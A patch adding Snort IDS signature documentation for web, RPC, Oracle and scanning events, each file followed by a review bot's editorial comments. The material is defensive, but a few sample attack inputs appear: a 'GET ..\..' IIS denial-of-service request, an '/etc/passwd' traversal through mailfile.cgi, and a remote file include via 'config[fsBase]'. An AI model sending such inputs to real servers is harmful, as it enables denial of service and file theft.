--- /dev/null
+++ b/doc/signatures/2408.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2408
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
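Review bot: Impact has "of the attackers choosing" (should be "attacker's choosing"). Detailed Information's "Many known vulnerabilities exist for each implementation and the attack scenarios are legion." tells the reader nothing about what SID 2408 matches; the Summary promises "a known vulnerability", so name it, and fill the empty Additional References with the corresponding advisory.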
--- /dev/null
+++ b/doc/signatures/974.txt
@@ -0,0 +1,61 @@
+Comment - move to deleted rules - applies to IIS 1.0 and decode/inspect should now find this.
+Rule:
+
+
+--
+Sid:
+974
+
+--
+Summary:
+This event is generated when an attempt is made to peform a denial of service against Internet Information Service (IIS) 1.0 hosts. 
+
+--
+Impact:
+Denial of service.  This attack may cause an IIS 1.0 server to crash.
+
+--
+Detailed Information:
+IIS 1.0 servers are vulnerable to a denial of service attack when a malformed request containing "..\.." is sent to the server.  The service must be restarted to restore functionality.
+
+--
+Affected Systems:
+IIS 1.0 Servers
+
+--
+Attack Scenarios:
+An attacker can send a malformed request to a vulnerable IIS server to cause a denial of service. 
+
+--
+Ease of Attack:
+Simple.  Send a request similar to this:  GET ..\.. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0229
+
+Bugtraq:
+http://www.securityfocus.com/bid/2218
+
+--
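Review bot: the first line of this file, "Comment - move to deleted rules - applies to IIS 1.0 and decode/inspect should now find this.", is an internal editorial note placed above "Rule:" and would ship to users as part of the documentation; either act on it (drop the file together with the rule) or remove the line. Summary has the typo "peform" (should be "perform"), and there are two blank lines after "Rule:" where the other files have one.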
--- /dev/null
+++ b/doc/signatures/826.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+826
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
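Review bot: this file duplicates doc/signatures/1508.txt verbatim, including "running ona web server" (should be "on a web server") and "of the attackers choosing" (should be "attacker's"). Two SIDs with identical documentation give the analyst no way to tell the events apart; state which CGI script or parameter SID 826 matches and add a reference in the empty Additional References section.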
--- /dev/null
+++ b/doc/signatures/2890.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2890
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_nchar
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
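Review bot: a line break has split a sentence in Detailed Information: "vulnerability in the procedure drop_priority_nchar" is followed by a line beginning ". This procedure is included in"; rejoin so the period follows the procedure name. Affected Systems has the doubled word "Oracle Oracle9i". Corrective Action says to "Apply the appropriate vendor supplied patch" but Additional References is empty; add the Oracle alert so the reader can find that patch. Ease of Attack is "Simple." for a buffer overflow in a PL/SQL procedure while the comparable overflow in 2426.txt is rated "Moderate."; the ratings should be applied consistently.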
--- /dev/null
+++ b/doc/signatures/619.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+619
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
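Review bot: the Summary "This event is generated when a scan is detected." does not say what kind of scan SID 619 identifies, and the FTP example in Attack Scenarios (ports 21 and 20) is the only hint; name the scan type or scanner signature the rule matches so the False Positives note about security audits can be evaluated. Additional References has an extra blank line before the closing separator.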
--- /dev/null
+++ b/doc/signatures/100000364.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000364
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "admin.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "admin.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
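Review bot: the third paragraph of Detailed Information and the whole of Attack Scenarios ("An attacker can access an authentication mechanism and supply his/her own credentials...") describe credential attacks, not the remote file include the Summary and first paragraph describe; replace them with the actual scenario, an attacker supplying a URL in the "config[fsBase]" parameter of "admin.php" so the interpreter fetches and runs remote code. Fix "running ona web server" to "on a web server" and the redundant "may indicate that an exploitation attempt has been attempted" to "may indicate an exploitation attempt". Corrective Action could add the standard PHP mitigation for remote includes, disabling remote URL inclusion in the interpreter configuration, alongside patching. The file also opens with two blank lines before "Rule:" and ends with an extra blank line after the final "--", unlike the rest of the patch.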
--- /dev/null
+++ b/doc/signatures/1756.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1756
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
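Review bot: Impact reads "Information gathering possible administrator access." and needs punctuation: "Information gathering. Possible administrator access." Detailed Information and Attack Scenarios refer only to "a sensitive file containing information on the IIS implementation" without naming the file or request the rule matches, so the entry cannot be checked against the rule; name it. The Sid is written inline as "Sid: 1756" followed by two blank lines, where every other file puts the number on its own line.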
--- /dev/null
+++ b/doc/signatures/2213.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2213
+
+--
+Summary:
+This event is generated when an attempt is made to access mailfile.cgi on an internal web server. This may indicate an attempt to exploit a file disclosure vulnerability in Oatmeal Studios Mail File 1.10.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Mail File 1.10 is a Perl script that allows web site visitors to email files to any user using an online form. It contains a vulnerability where an attacker can craft a URL with an arbitrary file name in the "filename" argument. If the file exists on the server, it is emailed to the address that the attacker specifies in the URL. 
+
+--
+Affected Systems:
+Systems running Oatmeal Studios Mail File 1.10.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to a vulnerable web server with /../../../etc/passwd as the filename argument. If the web server's password file exists at that location, it is sent to the email address specified in the URL.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses mailfile.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable mailfile.cgi.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1807
+
+--
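Review bot: Attack Scenarios says that with "/../../../etc/passwd as the filename argument" the "web server's password file" is emailed; /etc/passwd is the host's system account file, not a web server file, so say "the host's password file". The scenario also depends on the script not restricting the path, which is what the Detailed Information "arbitrary file name" sentence implies; make that explicit. Corrective Action only says "Disable mailfile.cgi."; if a fixed version exists the Bugtraq entry already cited should say so and it belongs here too.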
--- /dev/null
+++ b/doc/signatures/3385.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3385
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
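Review bot: the Attack Scenarios section ("An attacker may make a request for a file with an overly long filename via a network share") does not describe the condition given in the Detailed Information section, which is a malformed DCOM request sent over RPC that overflows a buffer; the scenario text looks copied from an SMB filename rule and should be rewritten to match the RPC description. Also "Expoit code exists" in Ease of Attack should read "Exploit code exists", and the Additional References section is empty even though the Corrective Action refers to vendor supplied patches, so the vendor bulletin that carries those patches should be cited there.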
--- /dev/null
+++ b/doc/signatures/1268.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1268
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) pcnfsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port pcnfsd is using.  Attackers can also learn what versions of the pcnfsd protocol are accepted by pcnfsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as pcnfsd run.  The pcnfsd RPC service handles printing and authentication over the network.  A vulnerability exists because of improper argument checking that allows execution of arbitrary commands with root privileges. 
+
+--
+Affected Systems:
+BSDI BSD/OS 2.1
+HP HP-UX 10.1, 10.10, 10.20, 11.0
+IBM AIX 3.2, 4.0, 4.1, 4.2
+SCO Open Server 5.0
+SCO Unixware 2.0, 2.0.3, 2.1
+SGI IRIX 6.5, 6.5.1 - 6.5.16 
+Sun Solaris 2.4, 2.5
+Sun SunOS 4.1, 4.1.1 - 4.1.4
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where pcnfsd runs.  This may be a precursor to accessing pcnfsd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access pcnfsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for pcnfsd, not probes of the pcnfsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the pcnfsd service itself. An attacker may attempt to go directly to the pcnfsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/5378
+
+CERT
+http://www.cert.org/advisories/CA-1996-08.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS22
+
+
+--
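Review bot: layout of the Additional References section is inconsistent with the other files in this patch: there is a stray blank line between the "Additional References:" header and the first entry, and two blank lines before the closing "--". Several lines also end in trailing whitespace ("Arachnids ", the "SGI IRIX 6.5, 6.5.1 - 6.5.16 " entry, and "Simple.  " under Ease of Attack); trim them so the separator lines stay uniform. The False Negatives paragraph is a good model of the caveat these docs should carry (the rule sees only the portmapper query, not direct access to the pcnfsd port) and could be reused in the other RPC rule docs.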
--- /dev/null
+++ b/doc/signatures/2692.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2692
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure verify_queue_types
+. This procedure is included in
+sys.dbms_aqadm_sys.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
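Review bot: in the Detailed Information section the sentence naming the affected procedure is split so that the period starts its own line ("vulnerability in the procedure verify_queue_types" followed by ". This procedure is included in" and "sys.dbms_aqadm_sys."); rejoin it as one sentence, "...in the procedure verify_queue_types. This procedure is included in sys.dbms_aqadm_sys." The Affected Systems entry "Oracle Oracle9i" repeats the vendor name. Also the "Rule: ", "Sid: " and several "-- " lines carry trailing spaces, which makes the separator lines differ from the bare "--" used elsewhere in the patch.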
--- /dev/null
+++ b/doc/signatures/3119.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3119
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
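Review bot: there is a stray blank line between the "-- " separator and the "Corrective Action:" header, which breaks the separator/header/body layout every other file in this patch follows; remove it. Several separators and field labels ("Rule: ", "Sid: ", "-- ") also carry trailing whitespace. In Affected Systems, "Microsoft Windows Server 2000" is not the product name; the product is "Windows 2000 Server", so the entry should be corrected to match the "Windows Server 2003" style used on the line above it.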
--- /dev/null
+++ b/doc/signatures/1523.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1523
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
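Review bot: "arbitrary code of the attackers choosing" in the Impact section is missing the apostrophe ("attacker's choosing"); the same phrase appears verbatim in the Impact sections of 1651.txt and 1727.txt in this patch, so fix all three together. Minor: the Detailed Information section uses both "Web server" and "web server" within two lines; pick one capitalisation.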
--- /dev/null
+++ b/doc/signatures/2173.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2173
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
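Review bot: the False Negatives entry "None Known." is hard to defend given the Detailed Information section, which says the rule matches on a filename extension commonly used by viruses; an attachment with a renamed extension or one wrapped in an archive would not match, and that limitation belongs in False Negatives so analysts do not treat silence as a clean bill of health. Typos: "An virus" should be "A virus" and "propogate" should be "propagate" in the Impact section. There is also a doubled blank line after the Sid value that the other files do not have.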
--- /dev/null
+++ b/doc/signatures/122-8.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-8
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+filtered distributed portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
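Review bot: "Apply any appropriate vendor supplied patches as appropriate." in Corrective Action says "appropriate" twice; "Apply any relevant vendor supplied patches." reads better. Spelling: "reconnaisance" in Impact should be "reconnaissance" and "consititute" in Detailed Information should be "constitute". The file opens with two blank lines before "Rule:", unlike most files in this patch; trim them so the files parse uniformly.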
--- /dev/null
+++ b/doc/signatures/1382.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+--
+Sid:
+1382
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known root
+exploit for Ettercap Network Sniffer (Version <= 0.6.2)
+
+--
+Impact:
+Remote attacker is able to gain root shell on host running ettercap.
+
+--
+Detailed Information:
+A buffer overflow in the parsing of IRC traffic for 'nick' passwords 
+enables a remote attacker to execute code of their choice as root on 
+the compromised host.  This is as a result of an unchecked string 
+copy of the captured password in the packet into the buffer used to 
+store all retrieved passwords.  The same or very similar overlows exist 
+for other string matches within this section of code in this and previous 
+versions of ettercap. 
+
+The exploit released by GOBBLES listens on port 0x8000 and provides a
+shell for the attacker.  Since ettercap is generaly run as root in order
+to have access to a promiscuous network interface, the shell will have
+uid=0 (root).
+--
+Attack Scenarios:
+Ettercap is likely to be deployed in 'sensitive' parts of the network
+where a network administrator is analysing passing traffic.  A
+compromise of a host in such a position will not only reveal any
+passwords already captured by ettercap to the attacker, but gives the
+attacker ample opportunity to analyse passing network traffic for
+further useful information.  The host will quite likely be used as a base for
+other attacks.  Ettercap may also be installed on a compromised host for
+the purpose of monitoring or modifying traffic on the hosts network.
+
+--
+Ease of Attack:
+Simple - exploit code pubished by 'GOBBLES' on
+vuln-dev - original posting can be seen here : 
+http://online.securityfocus.com/archive/82/245128
+
+--
+False Positives:
+Unlikely as an 'IDENTIFY' message should not be more than 200 bytes in normal usage.
+
+--
+False Negatives:
+Although the rule is good match for the posted exploit - there are
+several other strings which would match in the vulnerable section of
+code.  A better match might be obtained by specifying 'IDENTIFY ' with
+the datagram size (dsize) greater than 200, although this may introduce more false positives. 
+
+--
+Corrective Action:
+Upgrade to ettercap 0.6.3 or greater
+
+--
+Contributors: 
+Snort documentation contributed by Mark Vevers	Initial Research
+Snort documentation contributed by Josh Gray	Edits
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Attrition:
+http://www.attrition.org/security/advisory/gobbles/GOBBLES-12.txt
+
+Security Focus archive:
+http://online.securityfocus.com/archive/82/245128
+
+-- 
+
+--
